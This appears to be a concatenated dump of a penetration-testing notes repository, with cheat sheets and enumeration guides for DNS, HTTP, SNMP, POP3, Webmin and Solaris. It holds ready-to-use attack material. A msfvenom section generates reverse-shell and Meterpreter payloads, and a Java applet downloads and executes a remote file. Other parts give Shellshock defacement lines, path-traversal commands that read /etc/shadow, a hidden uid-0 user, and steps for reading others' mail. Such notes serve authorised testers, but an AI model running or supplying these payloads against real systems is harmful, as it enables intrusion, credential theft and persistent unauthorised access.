traffic to your machine (as root): 10 | arpspoof -i -t -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Solaris.txt: -------------------------------------------------------------------------------- 1 | [+] Solaris vulnerabilities: 2 | 3 | Solaris 7: 4 | sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl 5 | **ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client 6 | sendmail_exec LPD - line printer daemon buffer overflow - allows root 7 | heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root 8 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root 9 | kcms_readfile kcms / ttdbserverd remote file read (only in msf2) 10 | 11 | Solaris 8: 12 | sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl 13 | **ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client 14 | sendmail_exec LPD - line printer daemon buffer overflow - allows root 15 | heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root 16 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. 17 | no exploit - sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function. 18 | kcms_readfile kcms / ttdbserverd remote file read (only in msf2) 19 | 20 | solaris 9: 21 | sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl 22 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. 23 | sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function. 24 | kcms_readfile kcms / ttdbserverd remote file read (only in msf2) 25 | 26 | Solaris 10: 27 | fuser TELNET - authentication bypass through -f command - can be manually exploited 28 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. 29 | 30 | Solaris 11: 31 | fuser TELNET - authentication bypass through -f command - can be manually exploited 32 | 33 | [+] Adding solaris user: 34 | 35 | useradd -u 0 -o pentestuser 36 | passwd -d pentestuser 37 | 38 | [+] In addition, familiarise yourself with rpcinfo, nfsshell, showmount, 'mount -t nfs'. -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Tools.txt: -------------------------------------------------------------------------------- 1 | Browser Addons 2 | -------------- 3 | 4 | - Chrome: 5 | 6 | Recx Security Analyser 7 | Wappalyzer 8 | 9 | - Firefox/Iceweasel: 10 | 11 | Web Developer 12 | Tamper Data 13 | FoxyProxy Standard 14 | User Agent Switcher 15 | PassiveRecon 16 | Wappalyzer 17 | Firebug 18 | HackBar -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_UsefulCommands.txt: -------------------------------------------------------------------------------- 1 | Useful commands 2 | --------------- 3 | 4 | [+] Remove text using sed 5 | 6 | cat SSL_Hosts.txt | sed -r 's/\ttcp\t/:/g' 7 | 8 | [+] Port forwarding using NCAT 9 | 10 | ncat -lvkp 12345 -c "ncat --ssl 192.168.0.1 443" 11 | 12 | [+] Windows 7 or later, build port relay 13 | 14 | C:\> netsh interface portproxy add v4tov4 listenport= listenaddress=0.0.0.0 connectport= connectaddress= 15 | 16 | [+] Grab HTTP Headers 17 | 18 | curl -LIN 19 | 20 | [+] Quickly generate an MD5 hash for a text string using OpenSSL 21 | 22 | echo -n 'text to be encrypted' | openssl md5 23 | 24 | [+] Shutdown a Windows machine from Linux 25 | 26 | net rpc shutdown -I ipAddressOfWindowsPC -U username%password 27 | 28 | [+] Conficker Detection with NMAP 29 | 30 | nmap -PN -d -p445 --script=smb-check-vulns --script-args=safe=1 IP-RANGES 31 | 32 | [+] Determine if a port is open with bash 33 | 34 | (: /dev/null && echo "OPEN" || echo "CLOSED" -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_Vlans.txt: -------------------------------------------------------------------------------- 1 | Configure an Ethernet interface as a VLAN trunk 2 | --------------------------------------------------- 3 | 4 | Suppose that a host requires access to two VLANs, both carried by a trunk connected to physical interface eth0. The assigned IP addresses for the host are 192.168.2.1/24 on VLAN 2 and 192.168.3.1/24 on VLAN 3. 5 | 6 | [+] First install the vlan package if it is not already present: 7 | 8 | apt-get install vlan 9 | 10 | [+] Turn off network-manager 11 | 12 | sudo stop network-manager 13 | 14 | [+] Configuring interfaces 15 | 16 | vconfig add eth0 (you may get a warning message on the first one) 17 | example: vconfig add eth0 101 18 | 19 | ifconfig eth0. /24 up 20 | example: ifconfig eth0.101 192.168.1.10/24 up 21 | 22 | ifconfig eth0. 23 | 24 | Note: If any issues run, ifconfig eth0 0.0.0.0 up 25 | Note: Specify interface with nmap scanning (nmap -e eth0.101) 26 | Note: You will probably need to add individual routes for each vlan if you want to communicate between vlans, don't rely on your default gateway. (route add) 27 | 28 | [+] Remove Configuration 29 | vconfig rem eth0.101 30 | -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_VulnVerify.txt: -------------------------------------------------------------------------------- 1 | Verify Various Vulnerabilities 2 | ------------------------------ 3 | 4 | [+] IPMI Cipher Suite Zero Authentication Bypass: 5 | http://www.tenable.com/plugins/index.php?view=single&id=68931 6 | 7 | Tools required: 8 | ipmitool 9 | freeipmi-tools 10 | 11 | ipmitool -I lanplus -H 192.168.0.1 -U Administrator -P notapassword user list 12 | 13 | # Specifying Cipher Suite Zero 14 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword user list 15 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword chassis status 16 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword help 17 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword shell 18 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword sensor 19 | 20 | 21 | [+] Bash Remote Code Execution (Shellshock) 22 | http://www.tenable.com/plugins/index.php?view=single&id=77823 23 | 24 | x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt 25 | x: () { :;}; echo "Hacked" > /var/www/hacked.html 26 | 27 | 28 | [+] DNS Server Cache Snooping Remote Information Disclosure 29 | http://www.tenable.com/plugins/index.php?view=single&id=12217 30 | 31 | Nmap Script: dns-cache-snoop 32 | http://nmap.org/nsedoc/scripts/dns-cache-snoop.html 33 | 34 | nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}' 35 | 36 | 37 | [+] IP Forwarding Enabled 38 | http://www.tenable.com/plugins/index.php?view=single&id=50686 39 | 40 | Nmap Script: ip-forwarding 41 | http://nmap.org/nsedoc/scripts/ip-forwarding.html 42 | 43 | sudo nmap -sn --script ip-forwarding --script-args='target=www.example.com' 44 | 45 | Alternatives: 46 | - Set VM's default gateway as the victim IP address and attempt to route elsewhere. 47 | - http://pentestmonkey.net/tools/gateway-finder 48 | -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_WindowsCommandLine.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/Cheatsheet_WindowsCommandLine.pdf -------------------------------------------------------------------------------- /cheatSheets/Cheatsheet_scp.txt: -------------------------------------------------------------------------------- 1 | [+] Secure Copy (scp) Cheatsheet 2 | -------------------------------- 3 | 4 | [>] Copy remote file to local host: 5 | 6 | $ scp your_username@192.168.0.10: /some/local/directory 7 | 8 | [>] Copy local file to remote host: 9 | 10 | $ scp your_username@192.168.0.10:/some/remote/directory 11 | 12 | [>] Copy local directory to remote directory: 13 | 14 | scp -r your_username@192.168.0.10:/some/remote/directory/ 15 | 16 | [>] Copy a file from one remote host to another: 17 | 18 | scp your_username@:/some/remote/directory/foobar.txt your_username@:/some/remote/directory/ 19 | 20 | [>] Improve scp performance (use blowfish): 21 | 22 | scp -c blowfish your_username@192.168.0.10:/some/remote/directory -------------------------------------------------------------------------------- /cheatSheets/beginners_python_cheat_sheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/beginners_python_cheat_sheet.pdf -------------------------------------------------------------------------------- /cheatSheets/complexity_cheatsheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/complexity_cheatsheet.pdf -------------------------------------------------------------------------------- /cheatSheets/egghead-react-cheat-sheet-0-14-7.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/egghead-react-cheat-sheet-0-14-7.pdf -------------------------------------------------------------------------------- /cheatSheets/egghead-redux-cheat-sheet-3-2-1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/egghead-redux-cheat-sheet-3-2-1.pdf -------------------------------------------------------------------------------- /cheatSheets/emmet_cheat_sheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/emmet_cheat_sheet.pdf -------------------------------------------------------------------------------- /cheatSheets/html5_cheat_sheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/html5_cheat_sheet.pdf -------------------------------------------------------------------------------- /cheatSheets/jquery_cheat_sheet_1.3.2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/jquery_cheat_sheet_1.3.2.pdf -------------------------------------------------------------------------------- /cheatSheets/reverse_shell_with_msfvenom.txt: -------------------------------------------------------------------------------- 1 | ## Reverse Shell with Msfvenom - Cheatsheet 2 | 3 | ### List payloads 4 | 5 | {% highlight Shell %} 6 | 7 | ```Shell 8 | 9 | msfvenom -l 10 | ``` 11 | 12 | {% endhighlight %} 13 | 14 | Or 15 | 16 | {% highlight Shell %} 17 | 18 | ```Shell 19 | 20 | msfvenom --list payloads 21 | ``` 22 | 23 | {% endhighlight %} 24 | 25 | ### Generate a PHP payload 26 | 27 | {% highlight Shell %} 28 | 29 | ```Shell 30 | 31 | msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php 32 | ``` 33 | 34 | {% endhighlight %} 35 | 36 | ### Generate a Windows payload 37 | 38 | ##### Meterpreter - Reverse shell (x64): 39 | 40 | {% highlight Shell %} 41 | 42 | ```Shell 43 | 44 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe > reverse.exe 45 | ``` 46 | 47 | {% endhighlight %} 48 | 49 | ##### Meterpreter - Reverse shell: 50 | 51 | {% highlight Shell %} 52 | 53 | ```Shell 54 | 55 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > reverse.exe 56 | ``` 57 | 58 | {% endhighlight %} 59 | 60 | ##### Meterpreter - Bind shell: 61 | 62 | {% highlight Shell %} 63 | 64 | ```Shell 65 | 66 | msfvenom -p windows/meterpreter/bind_tcp RHOST= LPORT= -f exe > bind.exe 67 | ``` 68 | 69 | {% endhighlight %} 70 | 71 | ##### CMD - Reverse shell: 72 | 73 | {% highlight Shell %} 74 | 75 | ```Shell 76 | 77 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > prompt.exe 78 | ``` 79 | 80 | {% endhighlight %} 81 | 82 | ### Generate a Linux payload 83 | 84 | ##### Meterpreter - Reverse shell: 85 | 86 | {% highlight Shell %} 87 | 88 | ```Shell 89 | 90 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > reverse_bin 91 | ``` 92 | 93 | {% endhighlight %} 94 | 95 | ### Generate a Python payload 96 | 97 | {% highlight Shell %} 98 | 99 | ```Shell 100 | 101 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > reverse.py 102 | ``` 103 | 104 | {% endhighlight %} 105 | 106 | ### Generate a WAR payload 107 | 108 | {% highlight Shell %} 109 | 110 | ```Shell 111 | 112 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > payload.war 113 | ``` 114 | 115 | {% endhighlight %} 116 | 117 | ### Generate an ASP payload 118 | 119 | {% highlight Shell %} 120 | 121 | ```Shell 122 | 123 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > reverse.asp 124 | ``` 125 | 126 | {% endhighlight %} 127 | 128 | ### Generate encoded payloads 129 | 130 | ##### Shikata\_ga\_nai 131 | 132 | {% highlight Shell %} 133 | 134 | ```Shell 135 | 136 | msfvenom -p -e shikata_ga_nai -i 5 -f raw > reverse 137 | ``` 138 | 139 | {% endhighlight %} 140 | -------------------------------------------------------------------------------- /cheatSheets/sass.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/sass.png -------------------------------------------------------------------------------- /cheatSheets/sass_functions.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/cheatSheets/sass_functions.pdf -------------------------------------------------------------------------------- /client_side/signed_applet.java: -------------------------------------------------------------------------------- 1 | /** 2 | * This applet will download a file and execute it 3 | **/ 4 | 5 | import java.applet.*; 6 | import java.awt.*; 7 | import java.io.*; 8 | import java.net.URL; 9 | import java.util.*; 10 | 11 | public class Java extends Applet 12 | { 13 | private Object initialized = null; 14 | public Object isInitialized() 15 | { 16 | return initailized; 17 | } 18 | 19 | public void init() 20 | { 21 | Process f; 22 | try 23 | { 24 | String tmpdir = System.getProperty("java.io.tmpdir") + File.separator; 25 | String expath = tmpdir + "applet.exe"; 26 | String download = ""; 27 | download = getParameter("1"); 28 | if (download.length() > 0) 29 | { 30 | // URL Parameter 31 | URL url = new URL(download); 32 | // Get an input stream for reading 33 | InputStream in = url.openStream(); 34 | // Create a buffered input stream for efficiency 35 | BufferedInputStream bufIn = new BufferedInputStream(in); 36 | File outputFile = new File(expath); 37 | OutputStream out = new BufferedOutputStream(new FileOutputStream(outputFile)); 38 | byte[] buffer = new byte[2048]; 39 | for (;;) 40 | { 41 | int nBytes = bufIn.read(buffer); 42 | if (nBytes <= 0) break; 43 | out.write(buffer, 0, nBytes); 44 | } 45 | out.flush(); 46 | out.close(); 47 | in.close(); 48 | // Execute downloaded file 49 | f = Runtime.getRuntime().exec("cmd.exe /c " + expath); 50 | } 51 | } catch(IOException e) { 52 | e.printStackTrace(); 53 | } catch(Exception exception) { 54 | exception.printStackTrace(); 55 | } 56 | } 57 | } 58 | -------------------------------------------------------------------------------- /crypto/Crypto101.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/crypto/Crypto101.pdf -------------------------------------------------------------------------------- /enumeration/dns_enumeration.md: -------------------------------------------------------------------------------- 1 | # DNS Enumeration 2 | 3 | - NMAP DNS Hostnames Lookup 4 | 5 | ```ShellSession 6 | nmap -F --dns-server 7 | ``` 8 | 9 | - Host Lookup 10 | 11 | ```ShellSession 12 | host -t ns [megacorpone.com](http://megacorpone.com/) 13 | ``` 14 | 15 | - Reverse Lookup Brute Force - find domains in the same range 16 | 17 | ```ShellSession 18 | for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found" 19 | ``` 20 | 21 | - Perform DNS IP Lookup 22 | 23 | ```ShellSession 24 | dig a [domain-name-here.com](http://domain-name-here.com/) @nameserver 25 | ``` 26 | 27 | - Perform MX Record Lookup 28 | 29 | ```ShellSession 30 | dig mx [domain-name-here.com](http://domain-name-here.com/) @nameserver 31 | ``` 32 | 33 | - Perform Zone Transfer with DIG 34 | 35 | ```ShellSession 36 | dig axfr [domain-name-here.com](http://domain-name-here.com/) @nameserver 37 | ``` 38 | 39 | ## DNS Zone Transfers 40 | 41 | - Windows DNS zone transfer 42 | 43 | ```ShellSession 44 | nslookup -> set type=any -> ls -d [blah.com  ](http://blah.com/) 45 | ``` 46 | 47 | - Linux DNS zone transfer 48 | 49 | ```ShellSession 50 | dig axfr [blah.com](http://blah.com/) @[ns1.blah.com](http://ns1.blah.com/) 51 | ``` 52 | 53 | - Dnsrecon DNS Brute Force 54 | 55 | ```ShellSession 56 | dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml 57 | ``` 58 | 59 | - Dnsrecon DNS List of megacorp 60 | 61 | ```ShellSession 62 | dnsrecon -d [megacorpone.com](http://megacorpone.com/) -t axfr 63 | ``` 64 | 65 | - DNSEnum 66 | 67 | ```ShellSession 68 | dnsenum zonetransfer.m 69 | ``` 70 | -------------------------------------------------------------------------------- /enumeration/file_enumeration.md: -------------------------------------------------------------------------------- 1 | # File Enumeration 2 | 3 | - Find UID 0 files root execution 4 | 5 | ```ShellSession 6 | /usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\\\; 2>/dev/null 7 | ``` 8 | 9 | - Get handy linux file system enumeration script (/var/tmp) 10 | 11 | ```ShellSession 12 | wget 13 | 14 | chmod +x ./linux-local-enum.sh 15 | 16 | ./linux-local-enum.sh 17 | ``` 18 | 19 | - Find executable files updated in August 20 | 21 | ```ShellSession 22 | find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug 23 | ``` 24 | 25 | - Find a specific file on linux 26 | 27 | ```ShellSession 28 | find /. -name suid\\\*\\ 29 | ``` 30 | 31 | - Find all the strings in a file 32 | 33 | ```ShellSession 34 | strings 35 | ``` 36 | 37 | - Determine the type of a file 38 | 39 | ```ShellSession 40 | file 41 | ``` 42 | 43 | -------------------------------------------------------------------------------- /enumeration/http_enumeration.md: -------------------------------------------------------------------------------- 1 | # HTTP Enumeration 2 | 3 | - Search for folders with gobuster: 4 | 5 | ```ShellSession 6 | gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip 7 | ``` 8 | 9 | - OWasp DirBuster - Http folder enumeration - can take a dictionary file 10 | 11 | - Dirb - Directory brute force finding using a dictionary file 12 | 13 | ```ShellSession 14 | dirb http://$ip/ wordlist.dict 15 | 16 | dirb <> 17 | ``` 18 | 19 | - Dirb against a proxy 20 | 21 | ```ShellSession 22 | dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129 23 | ``` 24 | 25 | - Nikto 26 | 27 | ```ShellSession 28 | nikto -h $ip 29 | ``` 30 | 31 | - [HTTP Enumeration](#http-enumeration) 32 | 33 | ```ShellSession 34 | nmap --script=http-enum -p80 -n $ip/24 35 | ``` 36 | 37 | - Nmap Check the server methods 38 | 39 | ```ShellSession 40 | nmap --script http-methods --script-args http-methods.url-path='/test' $ip 41 | ``` 42 | 43 | - Get Options available from web server 44 | 45 | ```ShellSession 46 |   curl -vX OPTIONS vm/test 47 | ``` 48 | 49 | - Uniscan directory finder: 50 | 51 | ```ShellSession 52 | uniscan -qweds -u <> 53 | ``` 54 | 55 | - Wfuzz - The web brute forcer 56 | 57 | ```ShellSession 58 | wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test 59 | 60 | wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ 61 | 62 | wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ" 63 | 64 | wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ 65 | ``` 66 | 67 | - Recurse level 3 68 | 69 | ```ShellSession 70 | wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ 71 | ``` 72 | 73 | - Open a service using a port knock (Secured with Knockd) 74 | 75 | ```ShellSession 76 | for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 -max-retries 0 -p $x server_ip_address; done 77 | ``` 78 | 79 | - WordPress Scan - Wordpress security scanner 80 | 81 | ```ShellSession 82 | wpscan --url $ip/blog --proxy $ip:3129 83 | ``` 84 | 85 | - RSH Enumeration - Unencrypted file transfer system 86 | 87 | ```ShellSession 88 | auxiliary/scanner/rservices/rsh_login 89 | ``` 90 | 91 | - Finger Enumeration 92 | 93 | ```ShellSession 94 | finger @$ip 95 | 96 | finger batman@$ip 97 | ``` 98 | 99 | - TLS & SSL Testing 100 | 101 | ```ShellSession 102 | ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha > OUTPUT-FILE.html 103 | ``` 104 | 105 | - Proxy Enumeration (useful for open proxies) 106 | 107 | ```ShellSession 108 | nikto -useproxy http://$ip:3128 -h $ip 109 | ``` 110 | 111 | - Steganography 112 | 113 | ```ShellSession 114 | > apt-get install steghide 115 | 116 | > steghide extract -sf picture.jpg 117 | 118 | > steghide info picture.jpg 119 | 120 | > apt-get install stegosuite 121 | ``` 122 | 123 | - The OpenVAS Vulnerability Scanner 124 | 125 | ```ShellSession 126 | apt-get update 127 | 128 | apt-get install openvas 129 | 130 | openvas-setup 131 | 132 | netstat -tulpn 133 | 134 | Login at: https://$ip:939 135 | ``` 136 | -------------------------------------------------------------------------------- /enumeration/miniserv_webmin_enumeration.md: -------------------------------------------------------------------------------- 1 | # Miniserv and webmin Enumeration 2 | 3 | ## Test for LFI & file disclosure vulnerability by grabbing /etc/passwd 4 | 5 | ```ShellSession 6 | curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd 7 | ``` 8 | 9 | ## Test to see if webmin is running as root by grabbing /etc/shadow 10 | 11 | ```ShellSession 12 | curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow 13 | ``` 14 | -------------------------------------------------------------------------------- /enumeration/ms_sql_server_enumeration.md: -------------------------------------------------------------------------------- 1 | # MS SQL Server Enumeration 2 | 3 | - Nmap Information Gathering 4 | 5 | ```ShellSession 6 | nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes    --script-args mssql.instance port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip 7 | ``` 8 | -------------------------------------------------------------------------------- /enumeration/nfs_enumeration.md: -------------------------------------------------------------------------------- 1 | # NFS_Enumeration (Network File System).html 2 | 3 | - Show Mountable NFS Shares 4 | 5 | ```ShellSession 6 | nmap -sV --script=nfs-showmount $ip 7 | ``` 8 | 9 | -------------------------------------------------------------------------------- /enumeration/osint_recon_ng.md: -------------------------------------------------------------------------------- 1 | # OSINT By recon-ng 2 | 3 | ## Study case (trivago.com) 4 | 5 | ```Bash 6 | > recon-ng 7 | 8 | ## now let's add a workspace 9 | > workspaces add trivago.com 10 | 11 | ## Add the target domain 12 | > add domains trivago.com 13 | 14 | ## Double check if domain is added 15 | > show domains 16 | 17 | ## find related hosts to our domain 18 | > load netcraft 19 | > run 20 | 21 | ## check added hosts 22 | > show hosts 23 | 24 | ## Searching web 25 | > load google 26 | > load google_site_web 27 | > run 28 | 29 | ## Now it's time for brute-forcing 30 | > load brute 31 | > load brute_hosts 32 | > run 33 | 34 | ## resolve hosts 35 | > load resolve 36 | > run 37 | 38 | ## now reverse resolve 39 | > load reverse_resolve 40 | > use recon/hosts-hosts/reverse_resolve 41 | > run 42 | 43 | ## check hosts 44 | > show hosts 45 | 46 | ## Now let's get some geolocation info 47 | > load ipinfodb 48 | > run 49 | 50 | ## more geolocation info 51 | 52 | ### first edit /usr/local/Cellar/recon-ng/4.9.2/libexec/modules/recon/locations-locations/geocode.py 53 | ### also edit /usr/local/Cellar/recon-ng/4.9.2/libexec/modules/recon/locations-locations/reverse_geocode.py 54 | ### line 21 instead of `return` make it `continue` 55 | 56 | > load geocode 57 | > use recon/locations-locations/geocode 58 | 59 | > show options 60 | > show info 61 | > set SOURCE query SELECT DISTINCT host FROM hosts WHERE host IS NOT NULL 62 | > run 63 | 64 | ## Check locations 65 | > show locations 66 | 67 | ## Now reverse 68 | > load reverse 69 | > use recon/locations-locations/reverse_geocode 70 | > run 71 | 72 | ## Check locations 73 | > show locations 74 | 75 | ## Now let's change reverse_geocode query to run on hosts table 76 | > show info 77 | > set SOURCE query SELECT DISTINCT latitude || ',' || longitude FROM hosts WHERE latitude IS NOT NULL AND longitude IS NOT NULL 78 | > run 79 | 80 | ## Check locations 81 | > show locations 82 | 83 | ## now let's search contacts 84 | > search contacts 85 | > use recon/domains-contacts/whois_pocs 86 | > run 87 | 88 | > load pgp_search 89 | > run 90 | 91 | ## After you found some contacts, now let's see if there is any leaks for them 92 | > use recon/contacts-credentials/hibp_paste 93 | > run 94 | 95 | ## Now let's find some interesting files on the servers 96 | > use discovery/info_disclosure/interesting_files 97 | > run 98 | 99 | ``` 100 | 101 | https://github.com/jhaddix/domain 102 | -------------------------------------------------------------------------------- /enumeration/pop3_enumeration.md: -------------------------------------------------------------------------------- 1 | # POP3 Enumeration 2 | 3 | ## Reading other peoples mail 4 | 5 | You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet 6 | 7 | ```ShellSession 8 | root@kali:~# telnet $ip 110 9 | +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready 10 | USER billydean 11 | +OK 12 | PASS password 13 | +OK Welcome billydean 14 | 15 | list 16 | 17 | +OK 2 1807 18 | 1 786 19 | 2 1021 20 | 21 | retr 1 22 | 23 | +OK Message follows 24 | From: jamesbrown@motown.com 25 | Dear Billy Dean, 26 | 27 | Here is your login for remote desktop ... try not to forget it this time! 28 | username: billydean 29 | password: PA$$W0RD!Z 30 | ``` 31 | -------------------------------------------------------------------------------- /enumeration/rpc_enumeration.md: -------------------------------------------------------------------------------- 1 | # RPC Enumeration (Remote Procedure Call) 2 | 3 | ## Connect to an RPC share without a username and password and enumerate privileges 4 | 5 | ```ShellSession 6 | rpcclient --user="" --command=enumprivs -N $ip 7 | ``` 8 | 9 | ## Connect to an RPC share with a username and enumerate privileges 10 | 11 | ```ShellSession 12 | rpcclient --user="" --command=enumprivs $ip 13 | ``` 14 | -------------------------------------------------------------------------------- /enumeration/smtp_enumeration.md: -------------------------------------------------------------------------------- 1 | # SMTP Enumeration (Simple Mail Transfer Protocol) 2 | 3 | ```ShellSession 4 | root@kali:~# nc -nv 192.168.1.12 25 5 | (UNKNOWN) [192.168.1.12] 25 (smtp) open 6 | 220 WIN-3UR24XX66QZ Microsoft ESMTP MAIL Service, Version: 7.0.6001.18000 ready at Thu, 4 Jan 2018 11:48:35 +0200 7 | ``` 8 | -------------------------------------------------------------------------------- /enumeration/snmb_enumeration.md: -------------------------------------------------------------------------------- 1 | # SNMP Enumeration (Simple Network Management Protocol) 2 | 3 | ## Fix SNMP output values so they are human readable 4 | 5 | ```ShellSession 6 | apt-get install snmp-mibs-downloader download-mibs 7 | echo "" > /etc/snmp/snmp.conf 8 | ``` 9 | 10 | ## Scanning for SNMP 11 | 12 | ### Using nmap 13 | 14 | ```ShellSession 15 | root@kali:~# nmap -sU -v --open -p 161 192.168.1.12 16 | Note: SNMP is using UDP not TCP 17 | ``` 18 | 19 | ### Using onesixtyone 20 | 21 | ```ShellSession 22 | root@kali:~# echo public > /tmp/community.txt 23 | root@kali:~# echo private >> /tmp/community.txt 24 | root@kali:~# echo manager >> /tmp/community.txt 25 | root@kali:~# echo 192.168.1.12 > /tmp/ip.txt 26 | root@kali:~# onesixtyone -c /tmp/community.txt -i /tmp/ip.txt 27 | ``` 28 | 29 | ## Windows SNMP Enumeration Example 30 | 31 | ```ShellSession 32 | root@kali:~# snmpwalk -c puplic -v1 192.168.1.12 33 | ``` 34 | 35 | ## SNMP Enumeration Commands 36 | 37 | ```ShellSession 38 | snmpcheck -t $ip -c public 39 | 40 | snmpwalk -c public -v1 $ip 1| 41 | 42 | grep hrSWRunName|cut -d\* \* -f 43 | 44 | snmpenum -t $ip 45 | 46 | onesixtyone -c names -i hosts 47 | ``` 48 | 49 | ## SNMPv3 Enumeration 50 | 51 | ```ShellSession 52 | nmap -sV -p 161 --script=snmp-info $ip/24 53 | ``` 54 | 55 | ## Automate the username enumeration process for SNMPv3: 56 | 57 | ```ShellSession 58 | apt-get install snmp snmp-mibs-downloader 59 | wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb 60 | ``` 61 | 62 | ## SNMP Default Credentials 63 | 64 | ```ShellSession 65 | /usr/share/metasploit-framework/data/wordlists/snmp\_default\_pass.tx 66 | ``` 67 | -------------------------------------------------------------------------------- /enumeration/tools/host_list.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #Takes a list of URLs (without trailing slashes) or domains and runs the host command on them, sorting them by IP. 3 | #strip=$(cat $1|sed 's/https\?:\/\///') 4 | cat $1| while read line; do host "$line"; done |grep -E "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|sort -n -t " " -k 4 5 | -------------------------------------------------------------------------------- /enumeration/tools/mass.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | strip=$(echo $1|sed 's/https\?:\/\///') 3 | echo "" 4 | 